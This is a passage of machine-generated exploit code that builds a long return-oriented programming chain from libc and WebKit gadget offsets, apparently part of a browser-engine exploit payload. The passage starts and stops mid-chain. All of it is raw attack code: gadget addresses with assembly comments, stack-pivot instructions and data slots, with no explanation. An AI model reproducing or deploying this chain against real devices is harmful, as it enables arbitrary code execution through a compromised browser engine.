libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3504: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3506: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+207096, //L3509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+207080, //L3507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3507: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3509: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+207208, //L3510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+207240, //L3512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+207224, //L3511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3510: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3511: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3512: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+207360, //L3513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3513: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3515: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+207480, //L3518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+207464, //L3516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3516: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3518: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+207656, //L3521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+207672, //L3522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+207624, //L3519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+207640, //L3520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3519: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3520: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3521: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3522: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+207832, //L3526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+207800, //L3524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+207816, //L3525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3523: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3524: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3525: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3526: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+207920, //L3527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+207936, //L3528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3527: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3528: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+208112, //L3530 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+208128, //L3531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208096, //L3529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3529: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3530: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3531: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+208240, //L3533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+208288, //L3536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+208256, //L3534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3533: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3534: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3535: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3536: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+208400, //L3537+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+208392, //L3537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3537: db([0, 0]); // 0x0 set_gadgets([ ropchain+208416, //L3537+24 ropchain+210360, //L3532 libc_base+764760, //pop rsi ropchain+208456, //L3538 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3538: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3540: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+208576, //L3543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208560, //L3541 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3541: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3543: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+208720, //L3546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208688, //L3544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+208704, //L3545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3544: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3545: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3546: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+208800, //L3547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3547: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3549: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+208920, //L3552 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208904, //L3550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3550: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3552: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+209064, //L3555 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+209032, //L3553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+209048, //L3554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3553: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3554: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3555: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+209152, //L3557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3556: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3557: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+209208, //L3558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3558: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3560: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+209288, //L3562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3562: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+209400, //L3563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3563: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3565: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+209520, //L3568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+209504, //L3566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3566: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3568: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+209664, //L3571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+209632, //L3569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+209648, //L3570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3569: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3570: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3571: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+209744, //L3572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3572: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3573: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L3574: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+209872, //L3576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+209856, //L3575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3575: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3576: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+209952, //L3577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3577: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3579: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+210072, //L3582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+210056, //L3580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3580: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3582: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+210152, //L3584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+210184, //L3586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3584: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L3585: ropchain+210312, //L3583 libc_base+144605 //pop rdi ]); //L3586: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+210288, //L3588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+210304, //L3587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3588: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3587: db([0, 0]); // 0x0 //L3583: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+210376, //L3589 //L3532: libc_base+782311, //pop rsp ropchain+210392, //L3590 //L3589: libc_base+782311, //pop rsp ropchain+206592, //L3494 //L3590: //L3488: libc_base+764760, //pop rsi ropchain+210432, //L3591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3591: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3593: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+210552, //L3596 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+210536, //L3594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3594: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3596: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+210664, //L3597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+210696, //L3599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+210680, //L3598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3597: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3598: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3599: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+210800, //L3600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+210816, //L3601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3600: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3601: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+210936, //L3602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+210920, //L3603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3603: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3602: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+211024, //L3605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+211008, //L3604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3604: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3605: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+211128, //L3606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+211144, //L3607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3606: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3607: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+211264, //L3608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+211248, //L3609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3609: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3608: db([0, 0]); // 0x0 //__ntoa_format: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+211336, //L3611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L3611: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+211432, //L3612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+211464, //L3615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L3612: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3614: db([96, 0]); // 0x60 set_gadget(webkit_base+568675,); //pop r8 //L3615: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+211568, //L3618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+211552, //L3616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3616: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3618: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+211744, //L3621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+211760, //L3622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+211712, //L3619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+211728, //L3620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3619: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3620: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3621: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3622: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+211856, //L3624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+211840, //L3623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3623: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3624: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3625: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3626: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L3627: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+212056, //L3629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3629: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+212112, //L3630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3630: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+212248, //L3634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+212232, //L3633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3632: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3633: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3634: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+212368, //L3637 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+212336, //L3635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3635: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3636: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3637: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+212504, //L3639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+212520, //L3640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+212488, //L3638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3638: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3639: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3640: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+212632, //L3642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+212680, //L3645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+212648, //L3643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3643: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3644: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3645: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+212792, //L3646+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+212784, //L3646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3646: db([0, 0]); // 0x0 set_gadgets([ ropchain+212808, //L3646+24 ropchain+230352, //L3641 libc_base+764760, //pop rsi ropchain+212848, //L3647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3647: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3649: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+212968, //L3652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+212952, //L3650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3650: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3652: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+213144, //L3655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+213160, //L3656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+213112, //L3653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+213128, //L3654 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3653: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3654: db([0, 0]); // 0x0 